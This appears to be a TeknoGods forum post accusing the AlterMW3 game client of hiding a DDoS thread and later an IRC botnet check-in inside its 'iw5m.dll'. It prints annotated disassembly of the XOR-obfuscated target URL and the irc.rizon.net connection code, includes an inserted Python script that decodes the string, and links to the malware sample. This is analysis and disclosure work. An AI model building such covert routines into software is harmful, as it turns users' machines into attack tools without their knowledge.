Many of you have noticed we were under a heavy DDOS attack over the past week. After having fought it off pretty easily, we went out to investigate what kind of idiot would use his botnet for this kind of activity.
Today it came to our attention that ntauthority used YOU, the people who play in alterMW3, to do his dirty work. Yes, he used all of you – over 60000 people, to DDOS our website.
Below is a code snippet taken from AlterMW3’s “iw5m.dll” (the original, unmodified file is included with this post). The DLL contains a thread function that runs constantly while you’re playing AlterMW3. What does it do? Well, it turns out it runs a DDoS attack on our website:
.text:100EBF70 push ebp
.text:100EBF71 mov ebp, esp
.text:100EBF73 sub esp, 354h
.text:100EBF79 mov eax, dword_1029C6D0
.text:100EBF7E xor eax, ebp
.text:100EBF80 mov [ebp+var_4], eax
.text:100EBF83 push ebx
.text:100EBF84 push esi
.text:100EBF85 push edi
.text:100EBF86 push 3
.text:100EBF88 call sub_100BE567
.text:100EBF8D add esp, 4
.text:100EBF90 call sub_100BF381
.text:100EBF95 mov [ebp+var_8], eax
.text:100EBF98 cmp [ebp+var_8], 0
.text:100EBF9C jz loc_100EC483
.text:100EBFA2
.text:100EBFA2 loc_100EBFA2:
.text:100EBFA2 mov eax, 1
.text:100EBFA7 test eax, eax
.text:100EBFA9 jz loc_100EC483
.text:100EBFAF push 0FAh ; delay for the thread loop
.text:100EBFB4 call ds:Sleep
.text:100EBFBA mov [ebp+var_108], 't' ; encrypted link to teknogods forums
.text:100EBFC1 mov [ebp+var_107], 'h'
.text:100EBFC8 mov [ebp+var_106], 'h'
.text:100EBFCF mov [ebp+var_105], 'l'
.text:100EBFD6 mov [ebp+var_104], '&'
.text:100EBFDD mov [ebp+var_103], '3'
.text:100EBFE4 mov [ebp+var_102], '3'
.text:100EBFEB mov [ebp+var_101], 'k'
.text:100EBFF2 mov [ebp+var_100], 'k'
.text:100EBFF9 mov [ebp+var_FF], 'k'
.text:100EC000 mov [ebp+var_FE], '2'
.text:100EC007 mov [ebp+var_FD], 'h'
.text:100EC00E mov [ebp+var_FC], 'y'
.text:100EC015 mov [ebp+var_FB], 'w'
.text:100EC01C mov [ebp+var_FA], 'r'
.text:100EC023 mov [ebp+var_F9], 's'
.text:100EC02A mov [ebp+var_F8], '{'
.text:100EC031 mov [ebp+var_F7], 's'
.text:100EC038 mov [ebp+var_F6], 'x'
.text:100EC03F mov [ebp+var_F5], 'o'
.text:100EC046 mov [ebp+var_F4], '2'
.text:100EC04D mov [ebp+var_F3], '' ; non-printable byte (7Fh), shown blank here; 7Fh ^ 1Ch = 'c'
.text:100EC054 mov [ebp+var_F2], 's'
.text:100EC05B mov [ebp+var_F1], 'q'
.text:100EC062 mov [ebp+var_F0], '3'
.text:100EC069 mov [ebp+var_EF], 'l'
.text:100EC070 mov [ebp+var_EE], 't'
.text:100EC077 mov [ebp+var_ED], 'l'
.text:100EC07E mov [ebp+var_EC], '~'
.text:100EC085 mov [ebp+var_EB], '~'
.text:100EC08C mov [ebp+var_EA], '3'
.text:100EC093 mov [ebp+var_E9], 1Ch ; 1Ch ^ 1Ch = 0: the XOR-encoded NUL terminator
.text:100EC09A mov [ebp+var_20C], 0
As you can see, this piece of code builds an encrypted string “thhl&33kkk2hywrs{sxo2.sq3ltl~~” (the ‘.’ before “sq” stands for the non-printable byte 7Fh stored at var_F3, and the final 1Ch byte is the encrypted NUL terminator). If we XOR every byte of this string with 0x1C, the result is “http://www.teknogods.com/phpbb/”.
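The decoding step above can be automated straight from the IDA listing. The following script is an added example (not the post’s own tooling and not anything from the AlterMW3 code): it parses the `mov [ebp+var_N], imm` writes, groups them into runs of adjacent stack slots so the unrelated `mov [ebp+var_20C], 0` is left out, and recovers the XOR key two ways, from the encoded terminator and by brute force over all 256 single-byte keys ranked by known URL markers. The listing text is constructed from the snippet quoted above; the byte at var_F3 is written as `7Fh`, which is an assumption consistent with the page’s own decode (‘c’ ^ 0x1C == 0x7F).

```python
import re

# Constructed sample input: the stack-string writes quoted in the post, in IDA's
# listing format. The page shows the byte at var_F3 as '' because it is
# non-printable; 7Fh is assumed here (it decodes to the 'c' of ".com").
LISTING = """\
.text:100EBFBA mov [ebp+var_108], 't' ; encrypted link to teknogods forums
.text:100EBFC1 mov [ebp+var_107], 'h'
.text:100EBFC8 mov [ebp+var_106], 'h'
.text:100EBFCF mov [ebp+var_105], 'l'
.text:100EBFD6 mov [ebp+var_104], '&'
.text:100EBFDD mov [ebp+var_103], '3'
.text:100EBFE4 mov [ebp+var_102], '3'
.text:100EBFEB mov [ebp+var_101], 'k'
.text:100EBFF2 mov [ebp+var_100], 'k'
.text:100EBFF9 mov [ebp+var_FF], 'k'
.text:100EC000 mov [ebp+var_FE], '2'
.text:100EC007 mov [ebp+var_FD], 'h'
.text:100EC00E mov [ebp+var_FC], 'y'
.text:100EC015 mov [ebp+var_FB], 'w'
.text:100EC01C mov [ebp+var_FA], 'r'
.text:100EC023 mov [ebp+var_F9], 's'
.text:100EC02A mov [ebp+var_F8], '{'
.text:100EC031 mov [ebp+var_F7], 's'
.text:100EC038 mov [ebp+var_F6], 'x'
.text:100EC03F mov [ebp+var_F5], 'o'
.text:100EC046 mov [ebp+var_F4], '2'
.text:100EC04D mov [ebp+var_F3], 7Fh
.text:100EC054 mov [ebp+var_F2], 's'
.text:100EC05B mov [ebp+var_F1], 'q'
.text:100EC062 mov [ebp+var_F0], '3'
.text:100EC069 mov [ebp+var_EF], 'l'
.text:100EC070 mov [ebp+var_EE], 't'
.text:100EC077 mov [ebp+var_ED], 'l'
.text:100EC07E mov [ebp+var_EC], '~'
.text:100EC085 mov [ebp+var_EB], '~'
.text:100EC08C mov [ebp+var_EA], '3'
.text:100EC093 mov [ebp+var_E9], 1Ch
.text:100EC09A mov [ebp+var_20C], 0
"""

MOV_RE = re.compile(r"mov\s+\[ebp\+var_([0-9A-Fa-f]+)\],\s*(\S+)")


def parse_operand(op):
    """Turn an IDA immediate ('t', 7Fh, 1Ch, 0) into an integer."""
    if len(op) == 3 and op[0] == op[-1] == "'":
        return ord(op[1])
    if op[-1] in "hH":
        return int(op[:-1], 16)
    return int(op, 10)


def stack_writes(listing):
    """Map var_N offset -> byte for every 'mov [ebp+var_N], imm' (comments stripped)."""
    writes = {}
    for line in listing.splitlines():
        m = MOV_RE.search(line.split(";", 1)[0])
        if m:
            writes[int(m.group(1), 16)] = parse_operand(m.group(2)) & 0xFF
    return writes


def longest_run(writes):
    """Group writes into runs of adjacent stack slots and return the longest one in
    memory order: var_108 is the lowest address, so larger offsets come first."""
    best, run, prev = [], [], None
    for off in sorted(writes, reverse=True):
        if prev is not None and off != prev - 1:
            if len(run) > len(best):
                best = run
            run = []
        run.append(writes[off])
        prev = off
    if len(run) > len(best):
        best = run
    return bytes(best)


def xor_decode(encoded, key):
    """XOR every byte with key and cut at the first NUL (C-string semantics)."""
    return bytes(b ^ key for b in encoded).split(b"\x00", 1)[0]


def key_from_terminator(encoded):
    """Stack strings are NUL-terminated, so the last byte written is 0 ^ key = key."""
    return encoded[-1]


def brute_force_key(encoded, markers=(b"http", b"www.", b".com", b"/")):
    """Try all 256 single-byte keys; rank by markers found, then by a trailing NUL,
    then by how much of the decode is printable ASCII. Printability alone is not
    enough: several keys turn this blob into all-printable garbage."""
    def score(key):
        plain = bytes(b ^ key for b in encoded)
        body = plain.split(b"\x00", 1)[0]
        printable = sum(0x20 <= b <= 0x7E for b in body)
        return (sum(m in body for m in markers), plain.endswith(b"\x00"), printable)
    return max(range(256), key=score)


def recover_url(listing=LISTING):
    """Return (key, decoded string) for the longest stack string in the listing."""
    enc = longest_run(stack_writes(listing))
    key = key_from_terminator(enc)
    return key, xor_decode(enc, key).decode("ascii")


if __name__ == "__main__":
    key, url = recover_url()
    print(f"key=0x{key:02X} decoded={url!r}")
    print(f"brute force agrees: 0x{brute_force_key(longest_run(stack_writes(LISTING))):02X}")
```

The terminator trick works whenever the encoded NUL is written along with the string, as it is here; the brute force is the fallback for stack strings that are terminated elsewhere (or not at all), and the marker list is what makes it pick the right key rather than one of the several that merely yield printable bytes.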
This is the exact URL we were being hit on constantly (that is why we moved our forum to phpbb_a). You can thank ntauthority for making you a part of HIS private botnet. We’re wondering, though, what else he has used you people for? TeknoGods would never do anything like this, because it is lame, way below our standards and, not to mention, illegal.
Our dedicated servers work even when user is fully offline and do not require users to register for anything. Anyone can play from anywhere, anytime, offline and online (there are still a few bugs, but we’re working constantly to fix them).
TL;DR: AlterMW3 is malware; ntauthority of alteriw.net is using AlterMW3 users for a DDoS (distributed denial of service) attack against our web page.
If you’re a reverse-engineer, download the AlterMW3 ‘iw5m.dll’ malware here and see for yourself!
PS. New version of TeknoMW3 is almost ready!
LAST MINUTE UPDATE: The latest ‘iw5m.dll’ version of AlterMW3 connects to IRC – does it turn your computer into a fully remotely controlled zombie PC? We strongly suggest: never trust AlterIW ever again.
UPDATE #2:
Log of a lot of bots joining their channel: http://paste2.org/p/1898447 (see: Killed (http://irc.rizon.no (G-Lined: botnet not allowed on rizon)))
G-Lines are always MANUALLY added.
UPDATE #3:
They admit it here:
http://alteriw.net/viewtopic.php?f=140&t=109477#p1098485
UPDATE #4:
Their propaganda response here: http://alteriw.net/viewtopic.php?t=109481
UPDATE #5:
From their DLL from yesterday:
.text:100E8B64 lea ecx, [ebp+var_2C]
.text:100E8B67 call sub_100C561B
.text:100E8B6C mov [ebp+var_4], 0
.text:100E8B73 call sub_100C0D4B
.text:100E8B78 push eax
.text:100E8B79 push offset aQD ; “q%d”
.text:100E8B7E lea eax, [ebp+var_4C]
.text:100E8B81 push eax
.text:100E8B82 call sub_100C0EEA
.text:100E8B87 add esp, 0Ch
.text:100E8B8A push offset unk_1024C194
.text:100E8B8F push offset aVeryRealIndeed ; “very real indeed”
.text:100E8B94 lea eax, [ebp+var_4C]
.text:100E8B97 push eax
.text:100E8B98 call sub_100C4D88
.text:100E8B9D push eax
.text:100E8B9E push 1A0Bh ; 6667, the default IRC port
.text:100E8BA3 push offset aIrc_rizon_net ; “irc.rizon.net”
.text:100E8BA8 lea ecx, [ebp+var_2C]
.text:100E8BAB call sub_100C01B1
.text:100E8BB0 push offset sub_100C453B
.text:100E8BB5 push offset a376 ; “376”: IRC numeric RPL_ENDOFMOTD, so the handler fires once the server has finished sending the MOTD
.text:100E8BBA lea ecx, [ebp+var_2C]
.text:100E8BBD call sub_100C10B1
.text:100E8BC2 lea ecx, [ebp+var_2C]
.text:100E8BC5 call sub_100BE005
.text:100E8BCA mov [ebp+var_4], 0FFFFFFFFh
.text:100E8BD1 lea ecx, [ebp+var_2C]
.text:100E8BD4 call sub_100C36A4
This is not any “ingame IRC”; it is not referenced from anywhere else at the moment. What is it doing there anyway? It’s joining the #alteriwnet channel on irc.rizon.net to chat, except… you can’t. You can see from the earlier logs about the bots that this is the exact thing that was being called when the bots were joining. How did we find it? Well, while checking whether the latest DLL is also DDoSing us, we found that the DDoS functionality is gone and this (IRC) is done instead. In our books that looked like an upgrade from a simple DDoS app to a full-blown C&C botnet. We have not had time to fully analyse that part of their program, so decide for yourself whether to trust them again or not.
PPS: While being DDoSed we didn’t get an instant idea of ‘it must be alteriw!!!’, no. We never loaded your binaries into a disassembler until yesterday – thanks to an anonymous tip, we finally had a pointer to the cause of the DDoS – which of course had to be properly verified before making such a statement. The original reported screenshot can be found here.
UPDATE #6: AlterIW has issued a new response, it can be seen over here. Nice, way better than the previous one – except for the fact that even 1 request / millennium is too much (4 requests / second per user, from thousands of users simultaneously, isn’t nothing, by the way: Sleep(0xFA) = 250 ms between loop iterations). It doesn’t matter how often the software was abusing our site, just the fact that it did.
What’s done is done, lets move on…
Regards,
- TeknoGods Team -